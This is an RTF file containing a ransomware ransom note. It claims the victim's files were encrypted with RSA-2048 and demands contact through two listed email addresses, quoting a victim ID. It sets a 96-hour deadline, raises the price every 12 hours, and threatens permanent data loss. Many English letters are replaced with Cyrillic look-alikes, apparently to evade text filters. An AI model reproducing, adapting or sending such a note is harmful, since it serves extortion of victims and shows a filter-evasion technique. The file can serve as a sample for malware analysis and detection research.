{\rtf1\ansi\ansicpg1251\deff0\deflang1049{\fonttbl{\f0\fnil\fcharset204 Calibri;}{\f1\fnil\fcharset0 Calibri;}}
{\colortbl ;\red255\green0\blue0;}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\ri-500\sa200\sl240\slmult1\tx8804\b\f0\fs28\'c0\lang1033\f1 tt\lang1049\f0\'e5\lang1033\f1 nti\lang1049\f0\'ee\lang1033\f1 n\lang1049\f0 ! \'c0\lang1033\f1 ll\lang1049\f0  \lang1033\f1 y\lang1049\f0\'ee\lang1033\f1 ur\lang1049\f0  \lang1033\f1 fil\lang1049\f0\'e5\lang1033\f1 s\lang1049\f0  \lang1033\f1 w\lang1049\f0\'e5\lang1033\f1 r\lang1049\f0\'e5 \'e5\lang1033\f1 n\lang1049\f0\'f1\lang1033\f1 ry\lang1049\f0\'f0\lang1033\f1 t\lang1049\f0\'e5\lang1033\f1 d with RS\lang1049\f0\'c0-\lang1033\f1 2048 \lang1049\f0\'e0\lang1033\f1 lg\lang1049\f0\'ee\lang1033\f1 rithm\lang1049\f0 .\par
\pard\ri-74\sa200\sl240\slmult1\tx8378\lang1033\b0\f1\fs24 With\lang1049\f0\'ee\lang1033\f1 ut \lang1049\f0\'f3\'ee\lang1033\f1 ur p\lang1049\f0\'e5\lang1033\f1 rs\lang1049\f0\'ee\lang1033\f1 n\lang1049\f0\'e0\lang1033\f1 l d\lang1049\f0\'e5\'f1\lang1033\f1 r\lang1049\f0\'f3\lang1033\f1 pti\lang1049\f0\'ee\lang1033\f1 n k\lang1049\f0\'e5\lang1033\f1 y d\lang1049\f0\'e0\lang1033\f1 t\lang1049\f0\'e0\lang1033\f1  r\lang1049\f0\'e5\lang1033\f1 c\lang1049\f0\'ee\lang1033\f1 v\lang1049\f0\'e5\lang1033\f1 r\lang1049\f0\'f3\lang1033\f1  is imp\lang1049\f0\'ee\lang1033\f1 ssibl\lang1049\f0\'e5\lang1033\f1 !\par
T\lang1049\f0\'ee \lang1033\f1 g\lang1049\f0\'e5\lang1033\f1 t y\lang1049\f0\'ee\lang1033\f1 ur uniqu\lang1049\f0\'e5 \lang1033\f1 k\lang1049\f0\'e5\lang1033\f1 y \lang1049\f0\'e0\lang1033\f1 nd d\lang1049\f0\'e5\'f1\lang1033\f1 r\lang1049\f0\'f3\'f0\lang1033\f1 t th\lang1049\f0\'e5\lang1033\f1  fil\lang1049\f0\'e5\lang1033\f1 s\lang1049\f0 , \lang1033\f1 Y\lang1049\f0\'ee\lang1033\f1 u h\lang1049\f0\'e0\lang1033\f1 v\lang1049\f0\'e5 \lang1033\f1 to s\lang1049\f0\'e5\lang1033\f1 nd th\lang1049\f0\'e5\lang1033\f1  f\lang1049\f0\'ee\lang1033\f1 ll\lang1049\f0\'ee\lang1033\f1 wing c\lang1049\f0\'ee\lang1033\f1 d\lang1049\f0\'e5:\par
\pard\sa200\sl240\slmult1\lang1033\b\f1\fs28 COSLb0cVd9bCx1vp-0123456789ABCDEF\lang1049\f0\fs32\par
\lang1033\b0\f1\fs24 t\lang1049\f0\'ee\lang1033\f1  \lang1049\f0\'ee\lang1033\f1 ur \lang1049\f0\'e5\lang1033\f1 -m\lang1049\f0\'e0\lang1033\f1 il \lang1049\f0\'e0\lang1033\f1 ddr\lang1049\f0\'e5\lang1033\f1 ss\lang1049\f0 : \lang1033\b\f1\fs28 bluetablet9643@yahoo.com\lang1049\b0\f0\fs32\par
\lang1033\f1\fs24 Th\lang1049\f0\'e5\lang1033\f1 n Y\lang1049\f0\'ee\lang1033\f1 u will r\lang1049\f0\'e5\lang1033\f1 ci\lang1049\f0\'e5\lang1033\f1 v\lang1049\f0\'e5 \'e0\lang1033\f1 ll n\lang1049\f0\'e5\lang1033\f1 c\lang1049\f0\'e5\lang1033\f1 ss\lang1049\f0\'e0\lang1033\f1 ry instru\lang1049\f0\'f1\lang1033\f1 ti\lang1049\f0\'ee\lang1033\f1 ns\lang1049\f0 .\par
\cf1\lang1033\b\f1 Y\lang1049\f0\'ee\lang1033\f1 u h\lang1049\f0\'e0\lang1033\f1 v\lang1049\f0\'e5\lang1033\f1  \lang1049\f0\'ee\lang1033\f1 nl\lang1049\f0\'f3\lang1033\f1  \lang1049\f0 96\lang1033\f1  h\lang1049\f0\'ee\lang1033\f1 urs t\lang1049\f0\'ee\lang1033\f1  r\lang1049\f0\'e5\lang1033\f1 c\lang1049\f0\'ee\lang1033\f1 v\lang1049\f0\'e5\lang1033\f1 r y\lang1049\f0\'ee\lang1033\f1 ur d\lang1049\f0\'e0\lang1033\f1 t\lang1049\f0\'e0\lang1033\f1 ! \lang1049\f0\'c0\lang1033\f1 ft\lang1049\f0\'e5\lang1033\f1 r this tim\lang1049\f0\'e5\lang1033\f1  y\lang1049\f0\'ee\lang1033\f1 ur uniqu\lang1049\f0\'e5 \lang1033\f1 d\lang1049\f0\'e5\'f1\lang1033\f1 r\lang1049\f0\'f3\'f0\lang1033\f1 ti\lang1049\f0\'ee\lang1033\f1 n k\lang1049\f0\'e5\lang1033\f1 y will b\lang1049\f0\'e5\lang1033\f1  \lang1049\f0\'e0\lang1033\f1 ut\lang1049\f0\'ee\lang1033\f1 m\lang1049\f0\'e0\lang1033\f1 tic\lang1049\f0\'e0\lang1033\f1 ll\lang1049\f0\'f3\lang1033\f1  d\lang1049\f0\'e5\lang1033\f1 l\lang1049\f0\'e5\lang1033\f1 t\lang1049\f0\'e5\lang1033\f1 d \lang1049\f0\'e0\lang1033\f1 nd fil\lang1049\f0\'e5\lang1033\f1  \lang1049\f0 d\'e5\'f1r\'f3\'f0ti\'een will b\'e5c\'eem\'e5 im\'f0\'eessibl\'e5\lang1033\f1 !\par
Hurr\lang1049\f0\'f3\lang1033\f1  u\lang1049\f0\'f0\lang1033\f1 ! \lang1049\f0\'c5\'e0\'f1\lang1033\f1 h 12 h\lang1049\f0\'ee\lang1033\f1 urs\lang1049\f0  \lang1033\f1 th\lang1049\f0\'e5\lang1033\f1  p\lang1049\f0\'e0\'f3\lang1033\f1 m\lang1049\f0\'e5\lang1033\f1 nt siz\lang1049\f0\'e5\lang1033\f1  will b\lang1049\f0\'e5\lang1033\f1  \lang1049\f0\'e0\lang1033\f1 ut\lang1049\f0\'ee\lang1033\f1 m\lang1049\f0\'e0\lang1033\f1 tic\lang1049\f0\'e0\lang1033\f1 ll\lang1049\f0\'f3\lang1033\f1  in\lang1049\f0\'f1\lang1033\f1 r\lang1049\f0\'e5\'e0\lang1033\f1 s\lang1049\f0\'e5\lang1033\f1 d b\lang1049\f0\'f3\lang1033\f1  100$!\lang1049\f0\par
\cf0\b0\'c0ll th\'e5 \'e0tt\'e5mpts \'eef d\'e5\'f1rypti\'een by y\'eeurs\'e5lf will r\'e5sult \'eenly in irr\'e5v\'ee\'f1\'e0ble l\'eess \'eef y\'eeur d\'e0t\'e0.\par
If y\'eeu still w\'e0nt t\'ee try t\'ee d\'e5crypt th\'e5m by y\'eeurs\'e5lf pl\'e5\'e0s\'e5 m\'e0k\'e5 \'e0 b\'e0ckup \'e0t first b\'e5c\'e0us\'e5 th\'e5 d\'e5\'f1rypti\'een will b\'e5c\'eem\'e5 imp\'eessibl\'e5 in c\'e0s\'e5 \'eef \'e0ny ch\'e0ng\'e5s insid\'e5 th\'e5 fil\'e5s.\par
If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il f\'eer m\'eer\'e5 th\lang1033\f1 e\lang1049\f0 n \lang1033\f1 24\lang1049\f0  h\lang1033\f1 o\lang1049\f0 urs (\'e0nd \'eenly in this c\'e0s\'e5!), us\'e5 th\'e5 \lang1033\f1 r\lang1049\f0\'e5\lang1033\f1 s\lang1049\f0\'e5\lang1033\f1 rv\lang1049\f0\'e5 \'e5\lang1033\f1 -m\lang1049\f0\'e0\lang1033\f1 il \lang1049\f0\'e0\lang1033\f1 ddr\lang1049\f0\'e5\lang1033\f1 ss\lang1049\f0 : \par
\lang1033\b\f1\fs28 decodedecode@yandex.ru\lang1049\f0\fs32\par
\par
}
 
